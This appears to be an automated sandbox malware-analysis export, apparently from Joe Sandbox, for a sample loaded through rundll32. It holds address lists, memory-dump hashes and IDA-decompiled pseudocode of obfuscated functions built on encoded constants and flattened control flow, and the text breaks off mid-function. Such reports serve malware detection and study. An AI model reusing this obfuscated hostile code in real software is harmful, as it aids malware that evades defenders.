                                                                                                                      0x002b1abb
                                                                                                                      0x002b1ac5
                                                                                                                      0x002b1acf
                                                                                                                      0x002b1ad9
                                                                                                                      0x002b1ae0
                                                                                                                      0x002b1ae7
                                                                                                                      0x002b1aee
                                                                                                                      0x002b1af8
                                                                                                                      0x002b1b02
                                                                                                                      0x002b1b0c
                                                                                                                      0x002b1b16
                                                                                                                      0x002b1b20
                                                                                                                      0x002b1b2a
                                                                                                                      0x002b1b31
                                                                                                                      0x002b1b35
                                                                                                                      0x002b1b3e
                                                                                                                      0x002b1b4a
                                                                                                                      0x002b1b4f
                                                                                                                      0x002b1b54
                                                                                                                      0x002b1b5b
                                                                                                                      0x002b1b62
                                                                                                                      0x002b1b6c
                                                                                                                      0x002b1b71
                                                                                                                      0x002b1b76
                                                                                                                      0x002b1b7d
                                                                                                                      0x002b1b81
                                                                                                                      0x002b1b88
                                                                                                                      0x002b1b93
                                                                                                                      0x002b1b96
                                                                                                                      0x002b1b99
                                                                                                                      0x002b1ba0
                                                                                                                      0x002b1bae
                                                                                                                      0x002b1bb5
                                                                                                                      0x002b1bb6
                                                                                                                      0x002b1bb9
                                                                                                                      0x002b1bc0
                                                                                                                      0x002b1bc7
                                                                                                                      0x002b1bcb
                                                                                                                      0x002b1bd2
                                                                                                                      0x002b1bd9
                                                                                                                      0x002b1be0
                                                                                                                      0x002b1be7
                                                                                                                      0x002b1beb
                                                                                                                      0x002b1bef
                                                                                                                      0x002b1bf6
                                                                                                                      0x002b1bfd
                                                                                                                      0x002b1c01
                                                                                                                      0x002b1c08
                                                                                                                      0x002b1c0f
                                                                                                                      0x002b1c16
                                                                                                                      0x002b1c1d
                                                                                                                      0x002b1c24
                                                                                                                      0x002b1c2b
                                                                                                                      0x002b1c32
                                                                                                                      0x002b1c3c
                                                                                                                      0x002b1c46
                                                                                                                      0x002b1c50
                                                                                                                      0x002b1c5c
                                                                                                                      0x002b1c5f
                                                                                                                      0x002b1c6a
                                                                                                                      0x002b1c6d
                                                                                                                      0x002b1c74
                                                                                                                      0x002b1c7b
                                                                                                                      0x002b1c7f
                                                                                                                      0x002b1c86
                                                                                                                      0x002b1c8d
                                                                                                                      0x002b1c94
                                                                                                                      0x002b1c9b
                                                                                                                      0x002b1ca2
                                                                                                                      0x002b1ca9
                                                                                                                      0x002b1cb0
                                                                                                                      0x002b1cb7
                                                                                                                      0x002b1cbe
                                                                                                                      0x002b1cc5
                                                                                                                      0x002b1cc9
                                                                                                                      0x002b1cd0
                                                                                                                      0x002b1cda
                                                                                                                      0x002b1ce6
                                                                                                                      0x002b1cf0
                                                                                                                      0x002b1cf7
                                                                                                                      0x002b1cfe
                                                                                                                      0x002b1d05
                                                                                                                      0x002b1d12
                                                                                                                      0x002b1d13
                                                                                                                      0x002b1d16
                                                                                                                      0x002b1d1d
                                                                                                                      0x002b1d24
                                                                                                                      0x002b1d28
                                                                                                                      0x002b1d2f
                                                                                                                      0x002b1d36
                                                                                                                      0x002b1d42
                                                                                                                      0x002b1d45
                                                                                                                      0x002b1d48
                                                                                                                      0x002b1d4f
                                                                                                                      0x002b1d56
                                                                                                                      0x002b1d5d
                                                                                                                      0x002b1d64
                                                                                                                      0x002b1d6b
                                                                                                                      0x002b1d6f
                                                                                                                      0x002b1d76
                                                                                                                      0x002b1d7d
                                                                                                                      0x002b1d7d
                                                                                                                      0x002b1d7f
                                                                                                                      0x00000000
                                                                                                                      0x002b1d80
                                                                                                                      0x002b1d92
                                                                                                                      0x002b1f11
                                                                                                                      0x002b1f17
                                                                                                                      0x00000000
                                                                                                                      0x002b1d98
                                                                                                                      0x002b1d9e
                                                                                                                      0x002b1e2d
                                                                                                                      0x002b1e33
                                                                                                                      0x002b1efd
                                                                                                                      0x002b1f04
                                                                                                                      0x002b1f06
                                                                                                                      0x00000000
                                                                                                                      0x002b1e39
                                                                                                                      0x002b1e39
                                                                                                                      0x002b1e40
                                                                                                                      0x002b1e69
                                                                                                                      0x002b1e69
                                                                                                                      0x002b1e6d
                                                                                                                      0x002b1e6f
                                                                                                                      0x002b1e72
                                                                                                                      0x002b1e7e
                                                                                                                      0x002b1ead
                                                                                                                      0x002b1eb2
                                                                                                                      0x002b1ec1
                                                                                                                      0x002b1ec7
                                                                                                                      0x002b1ec7
                                                                                                                      0x002b1eca
                                                                                                                      0x002b1ecb
                                                                                                                      0x002b1ece
                                                                                                                      0x002b1ed3
                                                                                                                      0x002b1ee0
                                                                                                                      0x002b1ee9
                                                                                                                      0x002b1ee9
                                                                                                                      0x002b1e42
                                                                                                                      0x002b1e42
                                                                                                                      0x002b1e4a
                                                                                                                      0x002b1e4c
                                                                                                                      0x002b1e53
                                                                                                                      0x00000000
                                                                                                                      0x002b1e55
                                                                                                                      0x002b1e55
                                                                                                                      0x002b1e5d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b1e5d
                                                                                                                      0x002b1e53
                                                                                                                      0x002b1e4a
                                                                                                                      0x002b1e5f
                                                                                                                      0x00000000
                                                                                                                      0x002b1e5f
                                                                                                                      0x00000000
                                                                                                                      0x002b1da4
                                                                                                                      0x002b1daa
                                                                                                                      0x002b1e0d
                                                                                                                      0x002b1e12
                                                                                                                      0x002b1e14
                                                                                                                      0x002b1e17
                                                                                                                      0x002b1e1a
                                                                                                                      0x002b1e20
                                                                                                                      0x00000000
                                                                                                                      0x002b1e20
                                                                                                                      0x002b1dac
                                                                                                                      0x002b1db2
                                                                                                                      0x002b1f8c
                                                                                                                      0x002b1db8
                                                                                                                      0x002b1dbe
                                                                                                                      0x002b1f70
                                                                                                                      0x002b1f70
                                                                                                                      0x002b1f76
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b1f7c
                                                                                                                      0x002b1dc4
                                                                                                                      0x002b1dc4
                                                                                                                      0x002b1dd6
                                                                                                                      0x002b1de1
                                                                                                                      0x002b1de3
                                                                                                                      0x002b1de9
                                                                                                                      0x002b1de9
                                                                                                                      0x002b1d7d
                                                                                                                      0x002b1d7d
                                                                                                                      0x002b1d7f
                                                                                                                      0x00000000
                                                                                                                      0x002b1d7f
                                                                                                                      0x002b1d7d
                                                                                                                      0x002b1dbe
                                                                                                                      0x002b1db2
                                                                                                                      0x002b1daa
                                                                                                                      0x002b1d9e
                                                                                                                      0x002b1f9a
                                                                                                                      0x00000000
                                                                                                                      0x002b1f9a
                                                                                                                      0x002b1f21
                                                                                                                      0x002b1f24
                                                                                                                      0x002b1f2d
                                                                                                                      0x002b1f51
                                                                                                                      0x002b1f60
                                                                                                                      0x002b1f65
                                                                                                                      0x002b1f68
                                                                                                                      0x002b1f6f
                                                                                                                      0x00000000
                                                                                                                      0x002b1f6f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )|$.Wo$3`$^o$_6$~X$~b
                                                                                                                      • API String ID: 0-1767839032
                                                                                                                      • Opcode ID: eef91fe68660d8fda0360ca97d0afbe7e47c452db0b4903d5e0a85f4f344d683
                                                                                                                      • Instruction ID: 711b186d4458535c831d8e0d9406c3a9602c571eecc118062953af6c6dcd1cce
                                                                                                                      • Opcode Fuzzy Hash: eef91fe68660d8fda0360ca97d0afbe7e47c452db0b4903d5e0a85f4f344d683
                                                                                                                      • Instruction Fuzzy Hash: 69C1FEB1C0135DDBDB68CFA5D98A5DEBFB1FB00318F208159D116BA264C7B84A8ACF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002C04B8() {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				void* _t191;
                                                                                                                      				signed int _t193;
                                                                                                                      				signed int _t194;
                                                                                                                      				void* _t198;
                                                                                                                      				void* _t219;
                                                                                                                      				intOrPtr _t224;
                                                                                                                      				signed int _t225;
                                                                                                                      				signed int _t226;
                                                                                                                      				signed int _t227;
                                                                                                                      				signed int _t228;
                                                                                                                      				signed int _t229;
                                                                                                                      				signed int _t230;
                                                                                                                      				intOrPtr _t231;
                                                                                                                      				intOrPtr* _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int* _t234;
                                                                                                                      
                                                                                                                      				_t234 =  &_v88;
                                                                                                                      				_v12 = 0x2790ea;
                                                                                                                      				_v8 = 0xba5a5c;
                                                                                                                      				_t198 = 0x3d69ab1;
                                                                                                                      				_t224 = 0;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v60 = 0x2fd7ed;
                                                                                                                      				_v60 = _v60 | 0x771a9d11;
                                                                                                                      				_t225 = 0x45;
                                                                                                                      				_v60 = _v60 * 0x4e;
                                                                                                                      				_v60 = _v60 ^ 0x55773f16;
                                                                                                                      				_v40 = 0xe86db6;
                                                                                                                      				_v40 = _v40 | 0xabe4da9c;
                                                                                                                      				_v40 = _v40 ^ 0xabe3ff81;
                                                                                                                      				_v84 = 0x4e4c43;
                                                                                                                      				_v84 = _v84 + 0x2260;
                                                                                                                      				_v84 = _v84 / _t225;
                                                                                                                      				_t226 = 0x36;
                                                                                                                      				_v84 = _v84 / _t226;
                                                                                                                      				_v84 = _v84 ^ 0x000c99de;
                                                                                                                      				_v36 = 0x2c2e8d;
                                                                                                                      				_v36 = _v36 ^ 0x89bc573f;
                                                                                                                      				_v36 = _v36 ^ 0x899e3850;
                                                                                                                      				_v56 = 0xc456b8;
                                                                                                                      				_v56 = _v56 << 1;
                                                                                                                      				_t227 = 0x7a;
                                                                                                                      				_v56 = _v56 / _t227;
                                                                                                                      				_v56 = _v56 ^ 0x000dd00d;
                                                                                                                      				_v24 = 0x6eec6c;
                                                                                                                      				_v24 = _v24 * 0x67;
                                                                                                                      				_v24 = _v24 ^ 0x2ca24ccd;
                                                                                                                      				_v28 = 0xbd5c18;
                                                                                                                      				_v28 = _v28 + 0xd697;
                                                                                                                      				_v28 = _v28 ^ 0x00bf4353;
                                                                                                                      				_v32 = 0x8ab54f;
                                                                                                                      				_v32 = _v32 * 0x47;
                                                                                                                      				_v32 = _v32 ^ 0x267a3e13;
                                                                                                                      				_v88 = 0x583e0f;
                                                                                                                      				_v88 = _v88 >> 8;
                                                                                                                      				_v88 = _v88 + 0xffff5904;
                                                                                                                      				_v88 = _v88 << 0x10;
                                                                                                                      				_v88 = _v88 ^ 0xb14dc739;
                                                                                                                      				_v44 = 0x7902f;
                                                                                                                      				_v44 = _v44 + 0xffff35ef;
                                                                                                                      				_v44 = _v44 ^ 0x000a0038;
                                                                                                                      				_v64 = 0xab1413;
                                                                                                                      				_v64 = _v64 + 0xffff0fb9;
                                                                                                                      				_v64 = _v64 << 8;
                                                                                                                      				_v64 = _v64 ^ 0xaa2b0b8a;
                                                                                                                      				_v76 = 0x32b087;
                                                                                                                      				_v76 = _v76 | 0x42a79f0a;
                                                                                                                      				_v76 = _v76 ^ 0x7a54616b;
                                                                                                                      				_v76 = _v76 + 0x85;
                                                                                                                      				_v76 = _v76 ^ 0x38e777a2;
                                                                                                                      				_v20 = 0xba9969;
                                                                                                                      				_v20 = _v20 | 0x60b184e2;
                                                                                                                      				_v20 = _v20 ^ 0x60bd1ab4;
                                                                                                                      				_v52 = 0x531ceb;
                                                                                                                      				_v52 = _v52 ^ 0x8fc4675a;
                                                                                                                      				_v52 = _v52 >> 2;
                                                                                                                      				_v52 = _v52 ^ 0x23e32c7b;
                                                                                                                      				_v80 = 0xb054c0;
                                                                                                                      				_t228 = 0x5b;
                                                                                                                      				_v80 = _v80 / _t228;
                                                                                                                      				_v80 = _v80 << 1;
                                                                                                                      				_v80 = _v80 + 0xffffcecb;
                                                                                                                      				_v80 = _v80 ^ 0x0007d204;
                                                                                                                      				_v16 = 0x58f1c6;
                                                                                                                      				_v16 = _v16 ^ 0x8ee10e17;
                                                                                                                      				_v16 = _v16 ^ 0x8ebef1bd;
                                                                                                                      				_v68 = 0x312414;
                                                                                                                      				_t229 = 0x7b;
                                                                                                                      				_t233 = _v16;
                                                                                                                      				_v68 = _v68 / _t229;
                                                                                                                      				_v68 = _v68 + 0x1b34;
                                                                                                                      				_v68 = _v68 >> 2;
                                                                                                                      				_v68 = _v68 ^ 0x00095176;
                                                                                                                      				_t197 = _v16;
                                                                                                                      				_t230 = _v16;
                                                                                                                      				_v72 = 0xc0cd63;
                                                                                                                      				_v72 = _v72 | 0x9a162f11;
                                                                                                                      				_v72 = _v72 << 3;
                                                                                                                      				_v72 = _v72 * 0x12;
                                                                                                                      				_v72 = _v72 ^ 0x18eea785;
                                                                                                                      				_v48 = 0xaed007;
                                                                                                                      				_v48 = _v48 ^ 0x406d7cc3;
                                                                                                                      				_v48 = _v48 << 3;
                                                                                                                      				_v48 = _v48 ^ 0x061a7dff;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t219 = 0x5c;
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						do {
                                                                                                                      							L3:
                                                                                                                      							while(_t198 != 0x2c774a6) {
                                                                                                                      								if(_t198 == 0x3d69ab1) {
                                                                                                                      									_t198 = 0x526c216;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t198 == 0x4efcef6) {
                                                                                                                      										E002CE689(_v76, _v20, _v52, _t233, _v80);
                                                                                                                      										_t234 =  &(_t234[3]);
                                                                                                                      										_t198 = 0x2c774a6;
                                                                                                                      										goto L1;
                                                                                                                      									} else {
                                                                                                                      										if(_t198 == 0x526c216) {
                                                                                                                      											_t231 =  *0x2d520c; // 0x0
                                                                                                                      											_t232 = _t231 + 0x220;
                                                                                                                      											while( *_t232 != _t219) {
                                                                                                                      												_t232 = _t232 + 2;
                                                                                                                      											}
                                                                                                                      											_t230 = _t232 + 2;
                                                                                                                      											_t198 = 0xb318200;
                                                                                                                      											goto L2;
                                                                                                                      										} else {
                                                                                                                      											if(_t198 == 0x54b01d8) {
                                                                                                                      												_t193 = E002B2E96(_v56, _v24, _v28, _v60, _v32, _t230, _t197);
                                                                                                                      												_t234 =  &(_t234[5]);
                                                                                                                      												_t233 = _t193;
                                                                                                                      												_t191 = 0xe4f0407;
                                                                                                                      												_t198 =  !=  ? 0xe4f0407 : 0x2c774a6;
                                                                                                                      												_t219 = 0x5c;
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      												if(_t198 == 0xb318200) {
                                                                                                                      													_t194 = E002BEB36(_v84, _v36, _t198, _v40);
                                                                                                                      													_t197 = _t194;
                                                                                                                      													_t234 =  &(_t234[3]);
                                                                                                                      													if(_t194 != 0) {
                                                                                                                      														_t198 = 0x54b01d8;
                                                                                                                      														while(1) {
                                                                                                                      															L1:
                                                                                                                      															_t219 = 0x5c;
                                                                                                                      															goto L2;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												} else {
                                                                                                                      													if(_t198 != _t191) {
                                                                                                                      														goto L21;
                                                                                                                      													} else {
                                                                                                                      														E002BC67D(_t233, _v88, _v44, _v64);
                                                                                                                      														_t224 =  !=  ? 1 : _t224;
                                                                                                                      														_t198 = 0x4efcef6;
                                                                                                                      														while(1) {
                                                                                                                      															L1:
                                                                                                                      															_t219 = 0x5c;
                                                                                                                      															L2:
                                                                                                                      															goto L3;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								goto L22;
                                                                                                                      							}
                                                                                                                      							E002CE689(_v16, _v68, _v72, _t197, _v48);
                                                                                                                      							_t234 =  &(_t234[3]);
                                                                                                                      							_t198 = 0xc9e12b8;
                                                                                                                      							_t191 = 0xe4f0407;
                                                                                                                      							_t219 = 0x5c;
                                                                                                                      							L21:
                                                                                                                      						} while (_t198 != 0xc9e12b8);
                                                                                                                      						L22:
                                                                                                                      						return _t224;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}










































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$CLN$`"$kaTz$ln$vQ${,#
                                                                                                                      • API String ID: 0-3310206870
                                                                                                                      • Opcode ID: ff89035b76c83f44fc5b849f909ded31ae95c32f1a30828358fe34aa71ad25a0
                                                                                                                      • Instruction ID: 2859e0f05646c06fd17ac02f71435270558bbc66135fbaf021927e950f64d985
                                                                                                                      • Opcode Fuzzy Hash: ff89035b76c83f44fc5b849f909ded31ae95c32f1a30828358fe34aa71ad25a0
                                                                                                                      • Instruction Fuzzy Hash: 8DA15471528341DFC358CF65C88991BFBF1FBC4398F108A1EF59A96260D3B189598F82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                      • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                        • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                      • String ID: LOC
                                                                                                                      • API String ID: 3864805678-519433814
                                                                                                                      • Opcode ID: 63ab523a9a2e3d371aaeed16ad9493fb6f1cf84d76bfa06aab66571a3b8646f3
                                                                                                                      • Instruction ID: 7277114792b78e9780c732931990dc2d47c5509fa80221895377f97ab4224877
                                                                                                                      • Opcode Fuzzy Hash: 63ab523a9a2e3d371aaeed16ad9493fb6f1cf84d76bfa06aab66571a3b8646f3
                                                                                                                      • Instruction Fuzzy Hash: B711E171900118AFDB12DB64CC46BDD73B8EF09315F1241A1F7059F0A2EEB0EA869AD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E002C9186(void* __ecx, void* __edx, intOrPtr _a8) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				signed int _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				void* _t336;
                                                                                                                      				void* _t361;
                                                                                                                      				intOrPtr _t365;
                                                                                                                      				intOrPtr _t367;
                                                                                                                      				void* _t371;
                                                                                                                      				intOrPtr _t373;
                                                                                                                      				intOrPtr _t376;
                                                                                                                      				void* _t386;
                                                                                                                      				void* _t425;
                                                                                                                      				signed int _t426;
                                                                                                                      				signed int _t427;
                                                                                                                      				signed int _t428;
                                                                                                                      				signed int _t429;
                                                                                                                      				signed int _t430;
                                                                                                                      				signed int _t431;
                                                                                                                      				signed int _t432;
                                                                                                                      				signed int _t433;
                                                                                                                      				signed int _t434;
                                                                                                                      				signed int* _t439;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_t425 = 0;
                                                                                                                      				_push(0);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t336);
                                                                                                                      				_v1592 = 0xe90366;
                                                                                                                      				_t439 =  &(( &_v1704)[4]);
                                                                                                                      				_v1592 = _v1592 | 0xd8b262de;
                                                                                                                      				_v1592 = _v1592 ^ 0xd8fb63d7;
                                                                                                                      				_t386 = 0x283f0d8;
                                                                                                                      				_v1624 = 0xa39629;
                                                                                                                      				_v1624 = _v1624 >> 4;
                                                                                                                      				_t426 = 0x2c;
                                                                                                                      				_v1624 = _v1624 / _t426;
                                                                                                                      				_v1624 = _v1624 ^ 0x000bae79;
                                                                                                                      				_v1600 = 0xef5a7d;
                                                                                                                      				_t19 =  &_v1600; // 0xef5a7d
                                                                                                                      				_t427 = 0x1f;
                                                                                                                      				_v1600 =  *_t19 / _t427;
                                                                                                                      				_v1600 = _v1600 ^ 0x000c380d;
                                                                                                                      				_v1568 = 0xec630a;
                                                                                                                      				_t28 =  &_v1568; // 0xec630a
                                                                                                                      				_t428 = 0x1c;
                                                                                                                      				_v1568 =  *_t28 / _t428;
                                                                                                                      				_v1568 = _v1568 ^ 0x0002d50e;
                                                                                                                      				_v1668 = 0x697ac4;
                                                                                                                      				_v1668 = _v1668 ^ 0x43408629;
                                                                                                                      				_v1668 = _v1668 << 4;
                                                                                                                      				_v1668 = _v1668 << 0xf;
                                                                                                                      				_v1668 = _v1668 ^ 0xe763f227;
                                                                                                                      				_v1692 = 0xf5db19;
                                                                                                                      				_v1692 = _v1692 ^ 0xaa29ad2f;
                                                                                                                      				_v1692 = _v1692 >> 0xe;
                                                                                                                      				_v1692 = _v1692 << 6;
                                                                                                                      				_v1692 = _v1692 ^ 0x00a75d57;
                                                                                                                      				_v1620 = 0x9b43e;
                                                                                                                      				_v1620 = _v1620 >> 0xa;
                                                                                                                      				_v1620 = _v1620 + 0x190a;
                                                                                                                      				_v1620 = _v1620 ^ 0x0005a1ac;
                                                                                                                      				_v1572 = 0xd92c9a;
                                                                                                                      				_v1572 = _v1572 << 0xc;
                                                                                                                      				_v1572 = _v1572 ^ 0x92c3ac8e;
                                                                                                                      				_v1700 = 0x6f30ff;
                                                                                                                      				_v1700 = _v1700 << 0xe;
                                                                                                                      				_t429 = 0x26;
                                                                                                                      				_v1700 = _v1700 / _t429;
                                                                                                                      				_v1700 = _v1700 >> 0xe;
                                                                                                                      				_v1700 = _v1700 ^ 0x0006fa3f;
                                                                                                                      				_v1684 = 0x78d9c1;
                                                                                                                      				_v1684 = _v1684 * 0x25;
                                                                                                                      				_v1684 = _v1684 | 0x77a8ffeb;
                                                                                                                      				_v1684 = _v1684 ^ 0x77fd8a30;
                                                                                                                      				_v1656 = 0xa4e4c6;
                                                                                                                      				_v1656 = _v1656 + 0xa942;
                                                                                                                      				_v1656 = _v1656 + 0xffff73ad;
                                                                                                                      				_v1656 = _v1656 ^ 0x00a1f1ac;
                                                                                                                      				_v1652 = 0x64ed51;
                                                                                                                      				_v1652 = _v1652 >> 0xf;
                                                                                                                      				_v1652 = _v1652 * 0x5c;
                                                                                                                      				_v1652 = _v1652 ^ 0x00034dfd;
                                                                                                                      				_v1580 = 0x83183a;
                                                                                                                      				_v1580 = _v1580 ^ 0x32eb2c8f;
                                                                                                                      				_v1580 = _v1580 ^ 0x326d5fbf;
                                                                                                                      				_v1564 = 0x95c9ec;
                                                                                                                      				_v1564 = _v1564 >> 6;
                                                                                                                      				_v1564 = _v1564 ^ 0x0008f372;
                                                                                                                      				_v1588 = 0xb1660f;
                                                                                                                      				_v1588 = _v1588 + 0x4492;
                                                                                                                      				_v1588 = _v1588 ^ 0x00bbacbc;
                                                                                                                      				_v1676 = 0x88aa71;
                                                                                                                      				_v1676 = _v1676 << 0xd;
                                                                                                                      				_v1676 = _v1676 | 0x03baa1bf;
                                                                                                                      				_v1676 = _v1676 << 6;
                                                                                                                      				_v1676 = _v1676 ^ 0xffa89651;
                                                                                                                      				_v1632 = 0x868f26;
                                                                                                                      				_v1632 = _v1632 << 1;
                                                                                                                      				_v1632 = _v1632 + 0xffffb6b3;
                                                                                                                      				_v1632 = _v1632 ^ 0x010eb46f;
                                                                                                                      				_v1640 = 0xd64df9;
                                                                                                                      				_v1640 = _v1640 >> 6;
                                                                                                                      				_t430 = 0x32;
                                                                                                                      				_v1640 = _v1640 / _t430;
                                                                                                                      				_v1640 = _v1640 ^ 0x000ccd63;
                                                                                                                      				_v1664 = 0x22c79e;
                                                                                                                      				_t431 = 0xf;
                                                                                                                      				_v1664 = _v1664 * 9;
                                                                                                                      				_v1664 = _v1664 << 0xa;
                                                                                                                      				_v1664 = _v1664 ^ 0x4da35e74;
                                                                                                                      				_v1664 = _v1664 ^ 0xa9bd4987;
                                                                                                                      				_v1696 = 0xf7f994;
                                                                                                                      				_v1696 = _v1696 >> 0xf;
                                                                                                                      				_v1696 = _v1696 << 7;
                                                                                                                      				_v1696 = _v1696 + 0xffff3f9d;
                                                                                                                      				_v1696 = _v1696 ^ 0x000a4602;
                                                                                                                      				_v1648 = 0xefbcda;
                                                                                                                      				_v1648 = _v1648 | 0xaae2c2a8;
                                                                                                                      				_v1648 = _v1648 + 0x86a3;
                                                                                                                      				_v1648 = _v1648 ^ 0xaafdd76e;
                                                                                                                      				_v1680 = 0x28593a;
                                                                                                                      				_v1680 = _v1680 >> 4;
                                                                                                                      				_v1680 = _v1680 | 0x0bfc0be2;
                                                                                                                      				_v1680 = _v1680 + 0x55be;
                                                                                                                      				_v1680 = _v1680 ^ 0x0bf8c584;
                                                                                                                      				_v1596 = 0xd047d1;
                                                                                                                      				_v1596 = _v1596 | 0xaa1708a2;
                                                                                                                      				_v1596 = _v1596 ^ 0xaad8bb32;
                                                                                                                      				_v1604 = 0xf2c56f;
                                                                                                                      				_v1604 = _v1604 << 6;
                                                                                                                      				_v1604 = _v1604 ^ 0x3cb75693;
                                                                                                                      				_v1644 = 0x36719;
                                                                                                                      				_v1644 = _v1644 ^ 0x56bc0977;
                                                                                                                      				_t432 = 7;
                                                                                                                      				_v1644 = _v1644 / _t431;
                                                                                                                      				_v1644 = _v1644 ^ 0x05c6baf7;
                                                                                                                      				_v1672 = 0x1a4ba5;
                                                                                                                      				_v1672 = _v1672 << 2;
                                                                                                                      				_v1672 = _v1672 / _t432;
                                                                                                                      				_v1672 = _v1672 >> 2;
                                                                                                                      				_v1672 = _v1672 ^ 0x0008f53b;
                                                                                                                      				_v1628 = 0xe04a84;
                                                                                                                      				_v1628 = _v1628 | 0x71ddf7de;
                                                                                                                      				_v1628 = _v1628 + 0xd6a7;
                                                                                                                      				_v1628 = _v1628 ^ 0x71f84a11;
                                                                                                                      				_v1688 = 0xb42ba6;
                                                                                                                      				_t433 = 0x24;
